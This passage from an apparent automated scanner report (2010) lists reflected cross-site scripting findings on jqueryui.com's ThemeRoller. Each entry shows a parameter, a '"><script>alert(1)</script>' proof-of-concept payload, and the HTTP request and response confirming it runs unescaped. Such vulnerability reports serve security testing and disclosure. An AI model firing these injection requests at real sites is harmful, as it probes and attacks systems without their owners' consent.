User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:19:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&1ee58"><script>alert(1)</script>e852cc5eefd=1" type="text/css" media="all" />
...[SNIP]...

1.125. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25f"><script>alert(1)</script>4bda565ed47 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxbe25f"><script>alert(1)</script>4bda565ed47&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:27:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxbe25f"><script>alert(1)</script>4bda565ed47&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.126. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4c6"><script>alert(1)</script>26630e994c5 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px8f4c6"><script>alert(1)</script>26630e994c5&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px8f4c6"><script>alert(1)</script>26630e994c5&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.127. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b37"><script>alert(1)</script>02d95f1f6f4 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30d0b37"><script>alert(1)</script>02d95f1f6f4&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30d0b37"><script>alert(1)</script>02d95f1f6f4&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.128. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa92d"><script>alert(1)</script>b767f439082 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30fa92d"><script>alert(1)</script>b767f439082&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30fa92d"><script>alert(1)</script>b767f439082&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.129. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dee4"><script>alert(1)</script>e5fddab94a7 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px7dee4"><script>alert(1)</script>e5fddab94a7&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px7dee4"><script>alert(1)</script>e5fddab94a7&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.130. http://jqueryui.com/themeroller/_rollyourown.php [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae4d"><script>alert(1)</script>8380b7870fe was submitted in the bgColorActive parameter. This input was echoed as cae4d\\\"><script>alert(1)</script>8380b7870fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffffcae4d"><script>alert(1)</script>8380b7870fe&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorActive" id="bgColorActive" class="hex" value="ffffffcae4d\\\"><script>alert(1)</script>8380b7870fe" />
...[SNIP]...

1.131. http://jqueryui.com/themeroller/_rollyourown.php [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b331"><script>alert(1)</script>9ad54eb0294 was submitted in the bgColorContent parameter. This input was echoed as 1b331\\\"><script>alert(1)</script>9ad54eb0294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd1b331"><script>alert(1)</script>9ad54eb0294&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorContent" id="bgColorContent" class="hex" value="feeebd1b331\\\"><script>alert(1)</script>9ad54eb0294" />
...[SNIP]...

1.132. http://jqueryui.com/themeroller/_rollyourown.php [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b5ef"><script>alert(1)</script>005c2396836 was submitted in the bgColorDefault parameter. This input was echoed as 3b5ef\\\"><script>alert(1)</script>005c2396836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f3b5ef"><script>alert(1)</script>005c2396836&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
